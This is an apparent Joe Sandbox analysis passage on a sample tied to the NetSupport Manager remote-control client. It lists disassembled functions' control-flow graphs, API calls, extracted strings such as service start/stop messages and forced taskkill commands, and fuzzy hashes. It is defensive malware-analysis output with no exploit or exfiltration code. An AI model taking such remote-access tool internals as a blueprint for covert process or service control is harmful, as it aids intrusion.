                                                                                          Function 005D9630 Relevance: 147.5, APIs: 33, Strings: 51, Instructions: 547processservicesynchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 5d9630-5d968d OpenSCManagerW 1 5d968f-5d9692 0->1 2 5d96a2 0->2 3 5d969b-5d96a0 1->3 4 5d9694-5d9699 1->4 5 5d96a7-5d96ce call 5df030 GetLastError call 5df030 2->5 3->5 4->5 10 5d9df4-5d9e1c call 5df030 call 5e82b3 5->10 11 5d96d4-5d96f8 call 5d6700 OpenServiceW GetLastError call 5df030 5->11 20 5d9d2e-5d9d54 call 5df030 CloseServiceHandle Sleep 11->20 21 5d96fe-5d9727 QueryServiceStatus call 5df030 11->21 20->10 28 5d9d5a-5d9d5c 20->28 26 5d9729-5d972c 21->26 27 5d9732-5d9746 call 5df030 21->27 26->27 29 5d9b1e-5d9b24 26->29 39 5d974c-5d9765 call 5df030 call 5c6e30 27->39 40 5d9b07-5d9b1b call 5df030 27->40 28->10 31 5d9d62-5d9d8a call 5df030 GetSystemDirectoryW 28->31 34 5d9b2f-5d9b3f call 5df030 29->34 35 5d9b26-5d9b29 29->35 41 5d9d90-5d9d9a 31->41 47 5d9b96-5d9b9d 34->47 48 5d9b41-5d9b52 QueryServiceStatus 34->48 35->34 36 5d9d14-5d9d28 call 5df030 CloseServiceHandle 35->36 36->20 65 5d976c-5d97a5 call 593c80 call 593b70 call 5df030 39->65 66 5d9767 39->66 40->29 41->41 46 5d9d9c-5d9dbd 41->46 52 5d9dbf-5d9dc2 46->52 53 5d9dd2 46->53 55 5d9ba3-5d9bbd call 5df030 StartServiceW 47->55 56 5d9cfd-5d9d07 47->56 54 5d9b54-5d9b6a call 5df030 48->54 48->55 59 5d9dcb-5d9dd0 52->59 60 5d9dc4-5d9dc9 52->60 63 5d9dd7-5d9df1 call 5d6700 call 5ecda8 53->63 54->55 72 5d9b6c 54->72 75 5d9ce7-5d9cfb GetLastError call 5df030 55->75 76 5d9bc3-5d9be5 call 5df030 QueryServiceStatus 55->76 62 5d9d0c-5d9d11 call 5df030 56->62 59->63 60->63 62->36 63->10 100 5d97ab-5d97b7 call 5c6e30 65->100 101 5d99d7-5d99e3 call 5c6e30 65->101 66->65 80 5d9b70-5d9b73 72->80 75->36 87 5d9c18-5d9c36 call 5df030 call 5995b0 76->87 88 5d9be7-5d9bea 76->88 80->47 85 5d9b75-5d9b92 Sleep QueryServiceStatus 80->85 85->80 90 5d9b94 85->90 87->36 106 5d9c3c-5d9c40 87->106 91 5d9bec-5d9c0b Sleep QueryServiceStatus 88->91 92 5d9c0f-5d9c12 88->92 90->55 91->88 95 5d9c0d 91->95 92->87 96 5d9ce0-5d9ce5 92->96 95->87 96->62 111 5d97be-5d97f4 call 593c80 call 593b70 call 5df030 100->111 112 5d97b9 100->112 108 5d99ea-5d9a50 call 593c80 call 593b70 call 5df030 call 593b70 call 5df030 ControlService 101->108 109 5d99e5 101->109 106->36 110 5d9c46-5d9c57 RegisterEventSourceW 106->110 139 5d9ac5-5d9ade GetLastError call 5df030 Sleep 108->139 140 5d9a52-5d9a67 QueryServiceStatus 108->140 109->108 110->36 114 5d9c5d-5d9c83 GetComputerNameW 110->114 129 5d99c8-5d99d2 call 593da0 111->129 130 5d97fa-5d9806 call 5c6e30 111->130 112->111 117 5d9c8a-5d9cde wsprintfW ReportEventW DeregisterEventSource 114->117 118 5d9c85 114->118 117->36 118->117 129->101 137 5d980d-5d9843 call 593c80 call 593b70 call 5df030 130->137 138 5d9808 130->138 164 5d9849-5d9862 call 5b97d0 137->164 165 5d99b3-5d99c2 call 593da0 137->165 138->137 150 5d9ae4-5d9b05 call 593da0 * 2 139->150 143 5d9a9d-5d9ab4 call 5df030 140->143 144 5d9a69 140->144 143->150 147 5d9a70-5d9a73 144->147 151 5d9a98-5d9a9b 147->151 152 5d9a75-5d9a94 Sleep QueryServiceStatus 147->152 150->29 151->143 157 5d9ab6-5d9ac3 call 5df030 151->157 152->147 156 5d9a96 152->156 156->143 157->150 171 5d9874 164->171 172 5d9864-5d9872 call 5acf10 164->172 165->129 174 5d9876-5d989c call 5ad710 call 5df030 171->174 172->174 180 5d98ae-5d98b0 174->180 181 5d989e-5d98ab call 5ac620 call 5e7376 174->181 180->165 182 5d98b6-5d98bd call 5aff40 180->182 181->180 182->165 188 5d98c3-5d9901 call 5e8cd0 GetSystemDirectoryW call 5c6e30 182->188 194 5d9920-5d992a 188->194 195 5d9903-5d990d 188->195 194->194 197 5d992c-5d9931 194->197 195->195 196 5d990f-5d9919 195->196 198 5d9936-5d997a call 5df030 CreateProcessW 196->198 197->198 198->165 201 5d997c-5d99b0 WaitForSingleObject CloseHandle * 2 call 5df030 198->201 201->165
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,DE64E134), ref: 005D967A
                                                                                          • GetLastError.KERNEL32 ref: 005D96BB
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000034), ref: 005D96DD
                                                                                          • GetLastError.KERNEL32 ref: 005D96E5
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D970C
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000208), ref: 005D98EB
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 005D9972
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,00000000,00000000), ref: 005D9988
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOpenService$CreateDirectoryManagerObjectProcessQuerySingleStatusSystemWait
                                                                                          • String ID: AllowStop (admin) ret %x$AllowStop (direct vista) ret %x$AllowStop (service vista) ret %x$AllowStop (service) ret %x$AllowStop ret %x$Attempt to start the service$Attempt to stop the service$CICWClass$Calling %s$Client32 (%s)$ControlService failed with %d$D$Global\CICWClass$Global\CICWClassAdmin$Global\CICWClassVista$Global\NSMWClass$Global\NSMWClassAdmin$Global\NSMWClassVista$NSMWClass$NSMWClassVista$PCIapp$RESTART$Restarted client32 service after %s$START$STOP$Service Manager : %08x - %d$Service State : %d$Service failed to start after 60 seconds$Service failed to stop after 60 seconds$Service is running$Service is stopped$Service isn't in Stopped state$Service isn't running$Service started ok$Service stopped ok$StartService failed with %d$StartService ok$Use old method$Waiting a while until stopped$\net$\taskkill.exe /F /IM cicStudent.exe /IM cicplugin.exe /IM cicplugin64.exe$\taskkill.exe /F /IM client32.exe /IM runplugin.exe /IM runplugin64.exe$client32 control finished$close service$close service manager$crash$done taskkill$hClient %08x - %d$restart$start$stop
                                                                                          • API String ID: 244770378-63559561
                                                                                          • Opcode ID: 0ba80fe863290b5ad97ce9eec793f843293f20d16a4c94d9b0a5df4ae8703f22
                                                                                          • Instruction ID: dad16bc57475f5a9df79c43342af203ac02c3f2f85c9e194987e30dcf7a345b8
                                                                                          • Opcode Fuzzy Hash: 0ba80fe863290b5ad97ce9eec793f843293f20d16a4c94d9b0a5df4ae8703f22
                                                                                          • Instruction Fuzzy Hash: 9212FA71D01625ABEB30EB589C4AFAE7B65BB50704F0440A7F50AA7382DB705F45CF61
                                                                                          Function 005C4760 Relevance: 70.1, APIs: 21, Strings: 19, Instructions: 140libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 480 5c4760-5c479e GetModuleFileNameW 481 5c47dd-5c47e1 480->481 482 5c47a0-5c47b3 call 5e84df 480->482 484 5c47fd-5c481b GetModuleHandleW GetProcAddress 481->484 485 5c47e3-5c47f0 LoadLibraryW 481->485 482->481 491 5c47b5-5c47bf 482->491 486 5c481d-5c4829 484->486 487 5c482b-5c4854 GetProcAddress * 4 484->487 485->484 489 5c47f2-5c47fa LoadLibraryW 485->489 490 5c4857-5c48da GetProcAddress * 11 call 5e82b3 486->490 487->490 489->484 494 5c48df-5c48e2 490->494 493 5c47c0-5c47cd 491->493 493->493 495 5c47cf-5c47da LoadLibraryW 493->495 495->481
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 005C4790
                                                                                          • LoadLibraryW.KERNELBASE(?,?), ref: 005C47D8
                                                                                          • LoadLibraryW.KERNELBASE(DBGHELP.DLL,?,?), ref: 005C47E9
                                                                                          • LoadLibraryW.KERNEL32(IMAGEHLP.DLL,?,?), ref: 005C47F8
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 005C47FE
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 005C4812
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 005C4831
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 005C483C
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 005C4847
                                                                                          • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 005C4852
                                                                                          • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 005C485D
                                                                                          • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 005C4868
                                                                                          • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 005C4873
                                                                                          • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 005C487E
                                                                                          • GetProcAddress.KERNEL32(00000000,SymRefreshModuleList), ref: 005C4889
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 005C4894
                                                                                          • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 005C489F
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 005C48AA
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 005C48B5
                                                                                          • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 005C48C0
                                                                                          • GetProcAddress.KERNELBASE(00000000,MiniDumpWriteDump), ref: 005C48CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$Module$FileHandleName
                                                                                          • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymRefreshModuleList$SymSetOptions$dbghelp.dll
                                                                                          • API String ID: 1621119295-2166784381
                                                                                          • Opcode ID: 0280f42610265580adb2bb66829238b694377accd7d763b334b547230d881ab0
                                                                                          • Instruction ID: 6845aa514b8d96d3a9e718b209303198f7fcaccd3e20bf595039a2dad9a886d0
                                                                                          • Opcode Fuzzy Hash: 0280f42610265580adb2bb66829238b694377accd7d763b334b547230d881ab0
                                                                                          • Instruction Fuzzy Hash: CE41AF70E00704AFD7209F769C85D7BFBF9FF85B04704492EA446D3661EBB4E8418A58
                                                                                          Function 005DF030 Relevance: 49.4, APIs: 16, Strings: 12, Instructions: 387keyboardtimeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 696 5df030-5df0ab GetLocalTime wsprintfW 698 5df199-5df19f 696->698 699 5df0b1-5df0db wvsprintfW wsprintfW 696->699 701 5df1b6-5df1c8 EnterCriticalSection 698->701 702 5df1a1-5df1ac InitializeCriticalSection 698->702 699->698 700 5df0e1-5df0e7 699->700 700->698 703 5df0ed-5df0f5 700->703 704 5df1e9-5df201 GetCurrentDirectoryW 701->704 705 5df1ca-5df1cc 701->705 702->701 706 5df124-5df129 703->706 707 5df0f7-5df0fc call 5e7ca4 703->707 709 5df204-5df20e 704->709 708 5df1d0-5df1e5 705->708 711 5df130-5df139 706->711 716 5df101-5df10b 707->716 708->708 712 5df1e7 708->712 709->709 713 5df210-5df21f 709->713 711->711 717 5df13b-5df14a 711->717 714 5df247-5df25a call 5e84df 712->714 713->714 715 5df221-5df223 713->715 726 5df260-5df26e 714->726 727 5df423-5df43e LeaveCriticalSection call 5e82b3 714->727 718 5df230-5df245 715->718 720 5df599-5df5a9 call 5e82b3 716->720 721 5df111-5df11e 716->721 722 5df150-5df159 717->722 718->714 718->718 721->706 721->720 722->722 724 5df15b-5df168 722->724 724->720 728 5df16e-5df174 724->728 731 5df270-5df27d 726->731 732 5df177-5df186 728->732 731->731 734 5df27f-5df282 731->734 732->732 735 5df188-5df198 call 5e82b3 732->735 736 5df43f-5df44b 734->736 737 5df288-5df28e 734->737 739 5df44d 736->739 740 5df452-5df466 call 5e9583 736->740 737->727 741 5df294-5df2aa call 5e9583 737->741 739->740 740->727 747 5df468-5df499 call 5b34a0 740->747 748 5df335-5df342 GetKeyState 741->748 749 5df2b0-5df2cf call 591f50 call 5919e0 741->749 759 5df4af-5df4b5 747->759 760 5df49b-5df4ac call 5e73d1 747->760 750 5df344-5df34b GetKeyState 748->750 751 5df357-5df365 748->751 769 5df31d-5df322 749->769 770 5df2d1-5df2e9 call 5ea397 749->770 750->751 754 5df34d 750->754 755 5df370-5df377 751->755 754->751 755->727 758 5df37d-5df38e 755->758 763 5df395-5df3cf wsprintfW RegOpenKeyExW 758->763 764 5df390 758->764 766 5df4b7-5df4d9 call 5c9130 759->766 767 5df513-5df532 call 5c9130 759->767 760->759 771 5df419-5df41d 763->771 772 5df3d1-5df3f9 RegQueryValueExW 763->772 764->763 783 5df4e0-5df4e5 766->783 786 5df535-5df53a 767->786 780 5df32d-5df330 call 5b1dc0 769->780 781 5df324-5df32a call 5e8c09 769->781 789 5df2eb-5df2f2 770->789 790 5df2f4-5df30a call 5eb0ad 770->790 771->727 771->755 777 5df40c-5df413 RegCloseKey 772->777 778 5df3fb-5df407 call 5e8406 772->778 777->771 778->777 780->748 781->780 783->783 788 5df4e7-5df510 call 5e762e call 5e79a7 call 5e7376 783->788 786->786 792 5df53c-5df552 call 5e762e 786->792 788->767 795 5df310-5df31a call 5e8406 789->795 790->769 805 5df30c-5df30f 790->805 802 5df554-5df55b OutputDebugStringW 792->802 803 5df561-5df583 LeaveCriticalSection call 5e7376 792->803 795->769 802->803 811 5df58e-5df594 call 5b1dc0 803->811 812 5df585-5df58b call 5e8c09 803->812 805->795 811->720 812->811
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                          • wsprintfW.USER32 ref: 005DF09D
                                                                                          • wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                          • wsprintfW.USER32 ref: 005DF0D3
                                                                                          • InitializeCriticalSection.KERNEL32(0064250C), ref: 005DF1A6
                                                                                          • EnterCriticalSection.KERNEL32(0064250C), ref: 005DF1BB
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005DF1F5
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • GetKeyState.USER32(00000011), ref: 005DF33D
                                                                                          • GetKeyState.USER32(00000010), ref: 005DF346
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSectionStatewsprintf$AllocateCurrentDirectoryEnterHeapInitializeLocalTimewvsprintf
                                                                                          • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d $@$C:\Windows\Installer\$C:\Windows\Installer\$Log$Log=$SOFTWARE\Productive Computer Insight\%s$a+t$a+tc$winst32$winst32.log$winstall
                                                                                          • API String ID: 2905947201-2290212741
                                                                                          • Opcode ID: 27c980cbcfe30c4ea4b6082fdce231343c418f8bfd2a1dce58204565c48c41c9
                                                                                          • Instruction ID: b07da3560320d33f0ef914a6efa4dec8d0e4d88338af894ec8220284e133ffa6
                                                                                          • Opcode Fuzzy Hash: 27c980cbcfe30c4ea4b6082fdce231343c418f8bfd2a1dce58204565c48c41c9
                                                                                          • Instruction Fuzzy Hash: 0FE1287590021A9BCB34DF68EC65BEA7BB5FF44308F5484ABF90A97280E7705A84CF51
                                                                                          Function 005DDDD0 Relevance: 47.6, APIs: 10, Strings: 17, Instructions: 306COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 817 5dddd0-5dde38 SetUnhandledExceptionFilter GetModuleFileNameW 818 5dde3a GetLastError 817->818 819 5dde40-5ddee0 call 5d6080 call 5df030 * 2 GetUserNameW call 5aff40 call 5df030 call 5d5490 call 5b4690 call 599c30 call 5e9cae call 5eb0ad 817->819 818->819 841 5ddef9-5ddf08 819->841 842 5ddee2-5ddef7 call 5eb0ad 819->842 844 5ddf0c-5ddfa0 call 5df030 LoadStringW call 5da5b0 wsprintfW call 5da5b0 * 3 call 5e9116 841->844 842->841 842->844 860 5ddfa2-5ddfb6 844->860 860->860 861 5ddfb8-5ddfcc 860->861 862 5ddfd0-5ddfe4 861->862 862->862 863 5ddfe6-5ddffa 862->863 864 5de000-5de014 863->864 864->864 865 5de016-5de037 call 5eab18 864->865 868 5de040-5de054 865->868 868->868 869 5de056-5de085 call 5eab18 call 5df6d0 868->869 874 5de0dd-5de0f4 GetModuleFileNameW 869->874 875 5de087-5de0d1 GetPrivateProfileStringW lstrcmpiW 869->875 877 5de0fc-5de13f call 5df030 * 2 call 5d6080 874->877 878 5de0f6 GetLastError 874->878 875->874 876 5de0d3 875->876 876->874 886 5de141-5de14e 877->886 878->877 886->886 887 5de150-5de16f call 5ed09c 886->887 890 5de170-5de17a 887->890 890->890 891 5de17c-5de184 call 5db1f0 890->891 893 5de189-5de191 891->893 894 5de198-5de19a 893->894 895 5de193 893->895 896 5de1a0-5de1a9 894->896 895->894 896->896 897 5de1ab-5de1b2 896->897 898 5de1b5-5de1bf 897->898 898->898 899 5de1c1-5de1ee 898->899 900 5de1f0-5de1ff call 5e83b0 899->900 903 5de201-5de207 900->903 904 5de210 900->904 905 5de209-5de20e 903->905 906 5de213-5de220 call 5e83b0 903->906 904->906 905->904 905->906 909 5de231 906->909 910 5de222-5de228 906->910 912 5de234-5de238 909->912 911 5de22a-5de22f 910->911 910->912 911->909 911->912 913 5de23c-5de23f 912->913 914 5de23a 912->914 915 5de245-5de275 call 5ea558 913->915 916 5de663-5de669 913->916 914->913 943 5de29c-5de2a6 915->943 944 5de277-5de27f 915->944 918 5dedbd-5dedd1 call 5df030 916->918 919 5de66f-5de676 916->919 927 5dede7-5dedfc DestroyWindow 918->927 928 5dedd3-5dede1 PostMessageW 918->928 922 5de688-5de68d 919->922 923 5de678-5de682 GetCurrentDirectoryW 919->923 926 5de690-5de699 922->926 923->922 926->926 929 5de69b-5de6af 926->929 931 5def27-5def37 call 5e82b3 927->931 932 5dee02-5dee0f 927->932 928->927 933 5de6bc-5de6ec call 5d78f0 call 5df030 929->933 934 5de6b1-5de6b9 929->934 937 5dee10-5dee1d 932->937 933->918 951 5de6f2-5de70e call 5d4050 933->951 934->933 937->937 941 5dee1f-5dee35 call 5e9583 937->941 949 5dee4b-5dee51 941->949 950 5dee37-5dee48 call 5e73d1 call 5e8c09 941->950 943->900 947 5de281-5de28e 944->947 947->947 952 5de290-5de600 call 5e83b0 947->952 956 5dee71-5dee90 call 5df030 call 5e82b3 949->956 957 5dee53-5dee6e Sleep call 5df030 call 5d4420 949->957 950->949 951->918 952->900 968 5de606-5de60b 952->968 957->956 968->900
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0003A490,00000000,00000000,00000000), ref: 005DDE15
                                                                                          • GetModuleFileNameW.KERNEL32(00590000,?,00000100), ref: 005DDE34
                                                                                          • GetLastError.KERNEL32 ref: 005DDE3A
                                                                                          • GetUserNameW.ADVAPI32(?,00000050), ref: 005DDE89
                                                                                          • LoadStringW.USER32(?,000003E8,?,00000100), ref: 005DDF37
                                                                                          • wsprintfW.USER32 ref: 005DDF51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Name$ErrorExceptionFileFilterLastLoadModuleStringUnhandledUserwsprintf
                                                                                          • String ID: $/EC$/ec$Command Line: %s$NSM$NetSupport Manager for Windows (32 bit) V14.10$PCD$Start, session=%d, user=%s$V14.10$V15.10$boot$display.drv$module=%s$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                          • API String ID: 1797039228-697273600
                                                                                          • Opcode ID: d58720dd88b2b56ece28aac5e0ec753f7572d70ade42bedde5c3732105752d53
                                                                                          • Instruction ID: a4816805ba87681e70ecf8536e9e127c895fea8461da5743abc04ea855da9f9a
                                                                                          • Opcode Fuzzy Hash: d58720dd88b2b56ece28aac5e0ec753f7572d70ade42bedde5c3732105752d53
                                                                                          • Instruction Fuzzy Hash: ECB128B59402129BCB34FF68DC5BAAA3BB6FB45300F058167F5469B391E7705980CBA1
                                                                                          Function 005CA250 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 172threadmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005CA299
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 005CA2E0
                                                                                          • wsprintfW.USER32 ref: 005CA2F4
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 005CA310
                                                                                          • GetLastError.KERNEL32 ref: 005CA31A
                                                                                          • LocalAlloc.KERNEL32(00000040,00000014), ref: 005CA32F
                                                                                          • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 005CA340
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 005CA34D
                                                                                          • wsprintfW.USER32 ref: 005CA37F
                                                                                          • CreateEventW.KERNEL32(0000000C,00000000,00000000,?), ref: 005CA39A
                                                                                          • GetLastError.KERNEL32 ref: 005CA3A5
                                                                                          • CloseHandle.KERNEL32(000001EC), ref: 005CA3B9
                                                                                          • wsprintfW.USER32 ref: 005CA3E9
                                                                                          • CreateEventW.KERNEL32(0000000C,00000000,00000000,?), ref: 005CA404
                                                                                          • LocalFree.KERNEL32(?), ref: 005CA412
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CA420
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CA42F
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CA43E
                                                                                          • CreateThread.KERNELBASE(00000000,00002000,Function_00035A70,00000000,00000000,?), ref: 005CA45C
                                                                                          • SetThreadPriority.KERNELBASE(00000000,00000002), ref: 005CA46D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$Event$wsprintf$DescriptorErrorLastLocalSecurityThread$AllocCloseCurrentDaclFileFreeHandleInitializeModuleNamePriorityProcess
                                                                                          • String ID: %s.dmp.%05d$%s.dmp.%d$%s.maxidmp.%d$?????????
                                                                                          • API String ID: 3456320446-4071914627
                                                                                          • Opcode ID: fbc488d4429301f1f9385fce73b7c0b4fa4200657736a6d4f5a3d6d550111841
                                                                                          • Instruction ID: a0e30bd5b633d81c4f9b0d4e71e5341b333c6bc82bb8d345fe87f6173dfff033
                                                                                          • Opcode Fuzzy Hash: fbc488d4429301f1f9385fce73b7c0b4fa4200657736a6d4f5a3d6d550111841
                                                                                          • Instruction Fuzzy Hash: 59510AB1A40318EFEB209BA0DC8AFD97BBAFB44B05F105459F705A61D1D7F059808FA5
                                                                                          Function 005DF6D0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
